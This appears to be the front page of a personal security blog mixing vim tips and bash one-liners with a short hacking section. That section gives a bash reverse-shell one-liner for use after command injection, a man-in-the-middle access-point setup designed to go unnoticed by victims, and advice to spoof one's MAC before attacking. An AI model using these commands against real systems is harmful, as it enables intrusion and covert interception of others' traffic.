Welcome to badc0.de

About h4cking stuff, vim tricks, tutorials and one-liners


flash_on

what you can find here...

If you're interested in useful bash commands, vim basics or effeciant vim usage, you're right. This won't be a classic "blog". I will write down what I think what is useful and what I would have learned fewer. My (well-documentated) dotfiles, especially my .vimrc can be found on Github.

group

about me...

I'm a 29 years old security enthusiast, programmer and I love vim! In the past I successfully passed the Offensive Security Certified Professional and in near future I'm going to perform some tasks from eLearnSecurity (for fun and profit?!). Since a few years I deal with h4cking stuff and learned to use and love vim.

settings

other projects...

A few of my other projects are DumpMe, there you can see several informations about yourself, analyzed by your digital footprint. Another project is PasswordsOnline. In the beginning it was a project I coded only for me. But friends of mine told me they're also interested in this Project, so I've published it.

fancy vim image

Do you know vim?!

/usr/bin/vim is not an editor, it's a lifestyle...
Scrolling
12.02.2017

You can scroll the document without the need to move the cursor to the top/bottom: Ctrl-e to scroll down and Ctrl-y to scroll up.


ReadOnly
23.01.2017

Sometimes you want to open a file in read-only mode to prevent accidentally saving changes you've done on the fly. (When opening /etc/passwd, some log-files or whatever-config files for testing e.g.). Just type:

$ view /etc/passwd

The file will be opened in vim read-only and protects you from writing ;)


Advanced Searching
21.01.2017

You might already know you can search for a string using /searchpattern. If you want to quick switch between multiple results, you can easily search (in the whole file:

:lvim "<input" % followed by: :lopen

Will open a result buffer on the bottom. In this buffer, every line represents a search result containing the filename, line number and the content of the whole line itself. You can navigate using hjkl or the cursor buttons and hit enter to switch to the top buffer to the matching line. With Ctrl-w w you can switch back to the search results.


Read More (22)...

fancy bash image

Want some bash-foo?!

Oneliners, bashfoo and other useful tricks ;)
/sbin/ip (ifconfig is deprecated)
01.01.2017

Many of linux users are comfortable with ifconfig or route, but this tool is deprecated! The (imho better) tool is ip, which is contained in package iproute since Ubuntu 13.10 and Debian 7. I will give you a short tutorial about using /sbin/ip command.

In most parameters, one-letter abbreviation is allowed. Those commands are written as you would speak it out:

Bring interface up / down:


# Old ifconfig syntax: ifconfig eth0 up
# New ip syntax:
$ ip link set eth0 down
$ ip l s eth0 down
    

Assign ip address to interface:


# Old ifconfig syntax: ifconfig eth0 192.168.1.101 netmask 255.255.255.0
# New ip syntax:
$ ip addr add 192.168.1.101/24 dev eth0
$ ip a a 192.168.1.101/24 dev eth0
    

Flush interface:


# Old ifconfig syntax: ifconfig eth0 0.0.0.0
# New ip syntax:
$ ip addr flush eth0
$ ip a f eth0
    

Add new default route:


# Old ifconfig syntax: route add default gw 192.168.1.1 eth0
# New ip syntax:
$ ip route add default via 192.168.1.1
$ ip r a default via 192.168.1.1
    

It might appear it is more to type, but if you work with this command a few times you will see, that it's much easier and you can be smart-ass if you see someone typing ifconfig or route :P


Netcat
18.12.2016

Simple portscan: nc -vnzw1 192.168.1.1 80

Perform a GET request to target:

echo -e "GET / HTTP/1.1\r\nHost: fritz.box\r\n\r\n" | nc 192.168.178.1 80

vi or cd
15.12.2016

Add the following piece of code to your .bashrc


function vc {
CMDLINE=$(history 2 | head -1 | awk -F " " '{print $NF}')
[[ -f $CMDLINE ]] && $EDITOR $CMDLINE
[[ -d $CMDLINE ]] && cd $CMDLINE
}
        

What does this code do?!

It takes the last argument of the previous command and saves this string in variable $CMDLINE. If this string is a valid file (-f), it opens the file with the default editor (assuming your $EDITOR variable is set). If not, it checks if it's a directory, if so it changes from the current to the target directory. In my case, I named the function to vc (vim or cd) ;)

What's the usecase?!


grep stylesheet /var/www/html/mysite/subtree/index.html # Assume you want to edit the file now...
vc # Opens $EDITOR with /var/www/html/mysite/subtree/index.html
--- or ---
ls -lahtr /etc/nginx/sites-available # Assume you want to change in this directory now...
vc # Changes from the current directory to /etc/nginx/sites-available
--- or ---
cat ../../modules/database/db-connect-params.php
vc
        

Read More (6)...

fancy hacking image

Hack the planet...!

Reverse-Shell Plain Bash
25.11.2017

When you can inject system commands on a target and want to spawn a reverse-shell but no tools like perl, python, netcat or similar is available, there's a simple way to use built-ins:

bash -i >& /dev/tcp/{remote ip}/{remote port} 0>&1

MITM-Pre-Config
16.02.2017

If you act as a man-in-the-middle (WiFi AP, arp-spoofing, whatever) you don't want the victim to detect malicious behavior. To do so it's recommended to setup up a dns server, dhcp server and serve any network (internet e.g).

The tool dnsmasq can be used for that case. It contains a DHCP and DNS server. DNS requests are forwarded to DNS server configured in /etc/hosts and you can specify a dhcp range in one config file:


interface=wlan0
dhcp-range=interface:wlan0,10.0.0.50,10.0.0.99,infinite
    

Start dnsmasq with $ dnsmasq -C dnsmasq.conf

What's missing?!

Enable routing/nat:


$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    

Troubleshooting:

Be sure to assign a ip address from the correct network before you start dnsmasq!

You can download the example dnsmasq config file here or using wget https://badc0.de/dnsmasq.conf.


Before you hack - Change your MAC
08.01.2017

Before you attack a target over a network, be sure that you don't reveal your correct MAC address!

$ macchanger -r eth0

Your actual MAC address keeps unchanged, after a reboot the settings are restored. If you want to avoid rebooting your machine, type:

$ macchanger -p eth0


Read More (7)...